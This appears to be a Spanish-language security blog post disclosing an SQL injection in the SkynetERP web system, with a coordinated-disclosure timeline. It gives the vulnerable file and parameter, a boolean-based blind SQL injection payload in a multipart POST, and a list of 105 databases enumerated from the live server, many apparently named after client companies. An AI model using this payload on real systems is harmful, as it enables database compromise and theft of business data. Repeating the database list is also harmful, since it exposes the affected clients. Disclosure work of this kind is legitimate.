Posteado por JP el 08/11/2018

Tags: sqliskynet

Un ataque por inyección SQL consiste en la inserción o “inyección” de una consulta SQL por medio de los datos de entrada desde el cliente hacia la aplicación. Un ataque por inyección SQL exitoso puede leer información sensible desde la base de datos, modificar la información (Insert/ Update/ Delete), ejecutar operaciones de administración sobre la base de datos (tal como parar la base de datos), recuperar el contenido de un determinado archivo presente sobre el sistema de archivos del DBMS y en algunos casos emitir comandos al sistema operativo. Los ataques por inyección SQL son un tipo de ataque de inyección, en el cual los comandos SQL son insertados en la entrada de datos con la finalidad de efectuar la ejecución de comandos SQL predefinidos.(https://www.owasp.org/index.php/Inyecci%C3%B3n_SQL)

Documento:

SkynetERP - SQL Injection Vulnerabilities

Fecha de lanzamiento:

20 de Julio del 2018

Clase de vulnerabilidad:

SQL Injection

Producto e Introducción del Servicio :

Es un software ERP 100% web que cumple todos los aspectos tributarios y legales peruanos.Esta solución integra en un solo sistema, el manejo de las distintas áreas de tu empresa. Es la solución de Gestión Empresarial, que permite a las empresas evaluar, implementar y gestionar más fácilmente su negocio. (http://www.skyneterp.com/sobre-skynet.html)

Resumen de Asesoramiento:

El equipo de investigación de vulnerabilidades de RedSec descubrió una vulnerabilidad remota de inyección sql en el sistema denominado SkynetERP.

Producto(s) Afectado(s):

Skynet ERP

Técnica de Explotación:

Remota

Nivel de Severidad:

Alto

Tipo de Divulgación:

Divulgación Coordinada

Detalles Técnicos y Descripción:

La vulnerabilidad SQL Injection permite a atacantes remotos o cuentas de usuario con privilegios ejecutar comandos SQL maliciosos para comprometer el sistema de gestión de bases de datos y las aplicaciones web.

Las vulnerabilidades se encuentran en el parámetro directoryId del archivo /erpx/Componentes/c_socio_negocio/socio.negocio.services.php. Los atacantes con cuentas de usuario pueden ejecutar comandos sql maliciosos a través de la solicitud del método POST.

La explotación exitosa de la vulnerabilidad web resulta en el compromiso del sistema de gestión de bases de datos o aplicación web.

Exploit:

Parameter: MULTIPART directoryId ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: --__X_REDSEC_BOUNDARY__
Content-Disposition: form-data; name="operation"

GET_D
--__X_REDSEC_BOUNDARY__
Content-Disposition: form-data; name="directoryId"

42835 AND 4768=4768
--__X_REDSEC_BOUNDARY__
Content-Disposition: form-data; name="companyId"

1
--__X_REDSEC_BOUNDARY__--

Bases de Datos Disponibles:

  1. BDMaestra
  2. chat
  3. citrixdemo
  4. controlx
  5. cosac1
  6. cxabt1
  7. cxaceros
  8. cxaires
  9. cxalalau
  10. cxalta
  11. cxamerica
  12. cxarnao
  13. cxasp
  14. cxaudio
  15. cxautocons
  16. cxayllu1
  17. cxayllu2
  18. cxayllu3
  19. cxbelimoc
  20. cxberazu
  21. cxbonitel
  22. cxbryam
  23. cxcentell
  24. cxcharito
  25. cxcitrix3
  26. cxcomex
  27. cxcompustore
  28. cxcopemina
  29. cxcovema
  30. cxdemoenterprise7
  31. cxdeprove
  32. cxdesign
  33. cxdiocesis
  34. cxeco
  35. cxedinson
  36. cxesttilo
  37. cxeurolabs
  38. cxfmrem1
  39. cxfmrem2
  40. cxforce
  41. cxforperu
  42. cxgdata
  43. cxgescom
  44. cxglm
  45. cxgreen01
  46. cxgrupo3r
  47. cxids
  48. cximfesa1
  49. cximfesa2
  50. cximfesa3
  51. cximfesa4
  52. cxinfiniti
  53. cxintra2
  54. cxisaias
  55. cxjprehab
  56. cxkinsa
  57. cxlaser
  58. cxleon
  59. cxmalysac
  60. cxmaqui
  61. cxmarca
  62. cxmarcaja
  63. cxmarket
  64. cxmatriz
  65. cxmba
  66. cxmegate
  67. cxnadalco
  68. cxnecssein1
  69. cxntm
  70. cxomnitec
  71. cxordonez
  72. cxPanzer
  73. cxpequipo
  74. cxplasticos
  75. cxprovincia
  76. cxroad
  77. cxschulman
  78. cxselect
  79. cxsenati
  80. cxshalos
  81. cxshialer
  82. cxsicma
  83. cxsteel
  84. cxtambo
  85. cxtechlab
  86. cxtecniases1
  87. cxtecniases2
  88. cxtubillas
  89. cxuniversal
  90. cxvalky
  91. cxvalle
  92. cxvea
  93. cxysmar
  94. cxyulio
  95. cxzhara
  96. electronic
  97. gestionx
  98. icx_covema
  99. information_schema
  100. invoice_db
  101. libro_reclamacion
  102. mysql
  103. nodetest
  104. performance_schema
  105. skynet1

Timeline:

  • Descubrimiento del bug y primer contacto: 20 de Julio del 2018
  • Reporte del bug durante videollamada: 24 de Julio del 2018

Créditos y Autores:

Jorge Pacora [[email protected]]